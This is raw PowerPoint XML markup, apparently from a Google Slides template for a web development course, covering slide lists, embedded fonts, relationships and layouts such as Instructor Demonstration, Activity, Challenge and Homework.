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00" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId28"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="283" r:id="rId3"/>
    <p:sldId id="282" r:id="rId4"/>
    <p:sldId id="258" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="260" r:id="rId7"/>
    <p:sldId id="261" r:id="rId8"/>
    <p:sldId id="278" r:id="rId9"/>
    <p:sldId id="279" r:id="rId10"/>
    <p:sldId id="262" r:id="rId11"/>
    <p:sldId id="265" r:id="rId12"/>
    <p:sldId id="263" r:id="rId13"/>
    <p:sldId id="264" r:id="rId14"/>
    <p:sldId id="266" r:id="rId15"/>
    <p:sldId id="267" r:id="rId16"/>
    <p:sldId id="268" r:id="rId17"/>
    <p:sldId id="269" r:id="rId18"/>
    <p:sldId id="270" r:id="rId19"/>
    <p:sldId id="281" r:id="rId20"/>
    <p:sldId id="271" r:id="rId21"/>
    <p:sldId id="272" r:id="rId22"/>
    <p:sldId id="273" r:id="rId23"/>
    <p:sldId id="274" r:id="rId24"/>
    <p:sldId id="275" r:id="rId25"/>
    <p:sldId id="276" r:id="rId26"/>
    <p:sldId id="277" r:id="rId27"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
      <p:bold r:id="rId29"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId30"/>
      <p:bold r:id="rId31"/>
      <p:italic r:id="rId32"/>
      <p:boldItalic r:id="rId33"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Black" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:bold r:id="rId34"/>
      <p:boldItalic r:id="rId35"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId36"/>
      <p:bold r:id="rId37"/>
      <p:italic r:id="rId38"/>
      <p:boldItalic r:id="rId39"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId40"/>
      <p:bold r:id="rId41"/>
      <p:italic r:id="rId42"/>
      <p:boldItalic r:id="rId43"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Thin" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId44"/>
      <p:bold r:id="rId45"/>
      <p:italic r:id="rId46"/>
      <p:boldItalic r:id="rId4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15:clr>
            <a:srgbClr val="9AA0A6"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" orient="horz" pos="2232">
          <p15:clr>
            <a:srgbClr val="9AA0A6"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3"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enry" initials="H" lastIdx="2" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="Henry"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F0E2E5A-1893-4115-BEBC-C7BC51BD71B3}">
  <a:tblStyle styleId="{DF0E2E5A-1893-4115-BEBC-C7BC51BD71B3}"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0" d="100"/>
          <a:sy n="90" d="100"/>
        </p:scale>
        <p:origin x="816" y="84"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz"/>
        <p:guide orient="horz" pos="2232"/>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1.fntdata"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide20.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font6.fntdata"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font14.fntdata"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font19.fntdata"/><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1.fntdata"/><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font" Target="fonts/font12.fntdata"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font17.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font" Target="fonts/font8.fntdata"/><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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font16.fntdata"/><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font" Target="fonts/font7.fntdata"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font15.fntdata"/><Relationship Id="rId48"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font" Target="fonts/font10.fntdata"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font18.fntdata"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide19.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font13.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4"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1015" name="Google Shape;1015;g8798eb4c4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6" name="Google Shape;1016;g8798eb4c4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8"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1149" name="Google Shape;1149;g8798eb4c44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0" name="Google Shape;1150;g8798eb4c44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5"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1156" name="Google Shape;1156;g8623a2bef4_1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7" name="Google Shape;1157;g8623a2bef4_1_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5"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1166" name="Google Shape;1166;g8623a2bef4_1_1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7" name="Google Shape;1167;g8623a2bef4_1_1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5"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1176" name="Google Shape;1176;g8623a2bef4_1_1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7" name="Google Shape;1177;g8623a2bef4_1_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5"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1186" name="Google Shape;1186;g8623a2bef4_1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7" name="Google Shape;1187;g8623a2bef4_1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5"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1186" name="Google Shape;1186;g8623a2bef4_1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7" name="Google Shape;1187;g8623a2bef4_1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344907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8798eb4c44_0_1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8798eb4c44_0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2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1203" name="Google Shape;1203;g8798eb4c44_0_1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4" name="Google Shape;1204;g8798eb4c44_0_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0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1211" name="Google Shape;1211;g8798eb4c44_0_1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2" name="Google Shape;1212;g8798eb4c44_0_1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8"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1219" name="Google Shape;1219;g8798eb4c44_0_1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0" name="Google Shape;1220;g8798eb4c44_0_1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7"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048" name="Google Shape;1048;g80f7e6291e_1_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9" name="Google Shape;1049;g80f7e6291e_1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6"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1227" name="Google Shape;1227;g8798eb4c44_0_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8" name="Google Shape;1228;g8798eb4c44_0_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4"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1235" name="Google Shape;1235;g8798eb4c44_0_2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6" name="Google Shape;1236;g8798eb4c44_0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2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1243" name="Google Shape;1243;g8798eb4c44_0_2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4" name="Google Shape;1244;g8798eb4c44_0_2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3"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1054" name="Google Shape;1054;g8798eb4c4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5" name="Google Shape;1055;g8798eb4c4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1"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1062" name="Google Shape;1062;g8798eb4c44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3" name="Google Shape;1063;g8798eb4c44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9"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1070" name="Google Shape;1070;g8798eb4c44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1" name="Google Shape;1071;g8798eb4c44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7"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1078" name="Google Shape;1078;g8798eb4c44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9" name="Google Shape;1079;g8798eb4c44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7"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1128" name="Google Shape;1128;g8623a2bef4_1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9" name="Google Shape;1129;g8623a2bef4_1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5"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086" name="Google Shape;1086;g8623a2bef4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7" name="Google Shape;1087;g8623a2bef4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6"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1107" name="Google Shape;1107;g8623a2bef4_1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8" name="Google Shape;1108;g8623a2bef4_1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4.png"/></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5.png"/></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3.png"/></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 Title Slide: Web Development">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_1_1_2_2_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 7"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Google Shape;8;p2"/>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9" name="Google Shape;9;p2"/>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
        <p:nvSpPr>
          <p:cNvPr id="11" name="Google Shape;11;p2"/>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Web Development</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Google Shape;12;p2"/>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13" name="Google Shape;13;p2"/>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 name="Google Shape;14;p2"/>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 name="Google Shape;15;p2"/>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16" name="Google Shape;16;p2"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="776110" y="1231212"/>
            <a:ext cx="2286002" cy="1703068"/>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10. Instructor Demonstration">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 82"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="83" name="Google Shape;83;p11"/>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84" name="Google Shape;84;p11"/>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1"/>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87" name="Google Shape;87;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="242550" y="3895344"/>
            <a:ext cx="8907900" cy="427500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="91425" rIns="914400" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">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
        <p:nvSpPr>
          <p:cNvPr id="88" name="Google Shape;88;p11"/>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9" name="Google Shape;89;p11"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="409963" y="-228600"/>
            <a:ext cx="8535272" cy="4064423"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="Google Shape;90;p11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-101100" y="4387000"/>
            <a:ext cx="9251400" cy="482100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="9125" rIns="914400"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11. Activity">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 91"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="92" name="Google Shape;92;p12"/>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93" name="Google Shape;93;p12"/>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4" name="Google Shape;94;p12"/>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95" name="Google Shape;95;p12"/>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 name="Google Shape;96;p12"/>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7" name="Google Shape;97;p12"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="29" b="39"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="899000" y="1133363"/>
            <a:ext cx="1737360" cy="1911096"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98" name="Google Shape;98;p1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99" name="Google Shape;99;p12"/>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100" name="Google Shape;100;p12"/>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1" name="Google Shape;101;p12"/>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12. Activity with Instructions ">
  <p:cSld name="CUSTOM_2_5_1_3_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 102"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="103" name="Google Shape;103;p13"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="29" b="39"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8275625" y="4154800"/>
            <a:ext cx="594361" cy="653795"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Google Shape;104;p1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05" name="Google Shape;105;p1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06" name="Google Shape;106;p1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7" name="Google Shape;107;p1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8" name="Google Shape;108;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="109" name="Google Shape;109;p1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10" name="Google Shape;110;p13"/>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1" name="Google Shape;111;p13"/>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3. Challenge">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_4">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 112"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="113" name="Google Shape;113;p14"/>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14" name="Google Shape;114;p14"/>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5" name="Google Shape;115;p14"/>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16" name="Google Shape;116;p1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17" name="Google Shape;117;p14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>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8" name="Google Shape;118;p14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>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9" name="Google Shape;119;p14"/>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120" name="Google Shape;120;p14"/>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21" name="Google Shape;121;p14"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="273900" y="-595025"/>
            <a:ext cx="2950353" cy="514350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14. Challenge with Instructions">
  <p:cSld name="CUSTOM_2_5_1_4">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 122"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="Google Shape;123;p15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>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4" name="Google Shape;124;p1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25" name="Google Shape;125;p1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26" name="Google Shape;126;p15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>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127" name="Google Shape;127;p15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>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8" name="Google Shape;128;p15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>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29" name="Google Shape;129;p1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30" name="Google Shape;130;p15"/>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31" name="Google Shape;131;p15"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8213200" y="3862850"/>
            <a:ext cx="656773" cy="1144971"/>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15. Homework">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_3_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 132"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="133" name="Google Shape;133;p16"/>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34" name="Google Shape;134;p16"/>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5" name="Google Shape;135;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="209" r="209"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="858369" y="1097625"/>
            <a:ext cx="1737361" cy="1980591"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="Google Shape;136;p16"/>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7" name="Google Shape;137;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8062160" y="3975150"/>
            <a:ext cx="548640" cy="725893"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138" name="Google Shape;138;p1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39" name="Google Shape;139;p16"/>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0" name="Google Shape;140;p16"/>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Due Date:</a:t>
            </a:r>
            <a:endParaRPr sz="1300" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="Google Shape;141;p16"/>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2" name="Google Shape;142;p16"/>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1800">
          <p15:clr>
            <a:srgbClr val="F9AD4C"/>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16. Homework with Instructions">
  <p:cSld name="CUSTOM_2_5_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 143"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
